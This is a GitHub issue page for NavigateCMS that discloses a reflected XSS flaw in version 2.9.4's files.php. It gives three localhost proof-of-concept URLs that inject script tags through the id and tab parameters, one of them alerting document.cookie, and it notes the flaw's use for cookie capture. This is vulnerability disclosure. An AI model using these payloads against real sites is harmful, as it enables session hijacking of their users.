Navigate CMS, a very powerful open source content management system for everybody.
GNU General Public License v2.0
8
stars
4
forks
source link
[Security Bug] XSS in \lib\packages\files\files.php in NavigateCMS 2.9.4 r1561 #30
Closed
faisalfs10x closed 2 years ago
Vulnerability Name: XSS
Product version: NavigateCMS 2.9.4 r1561
Vulnerability Description: XSS to capture the cookies of anyone that navigates to the vulnerable URL
Vulnerable URL:
1) http://localhost/navigate2.9.4/navigate/navigate.php?fid=files&act=edit&op=replace_file&id=%3Cscript%3Ealert(%22xss-1%22)%3C/script%3E
2) http://localhost/navigate2.9.4/navigate/navigate.php?fid=files&act=edit&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E
3) http://localhost/navigate2.9.4/navigate/navigate.php?fid=files&act=edit&op=replace_file&id=%3CsCriPt%3Ealert(%22XSS-1%22)%3C/sCriPt%3E&tab=%3CsCriPt%3Ealert(%22XSS-2%22)%3C/sCriPt%3E
Affected Source code: \lib\packages\files\files.php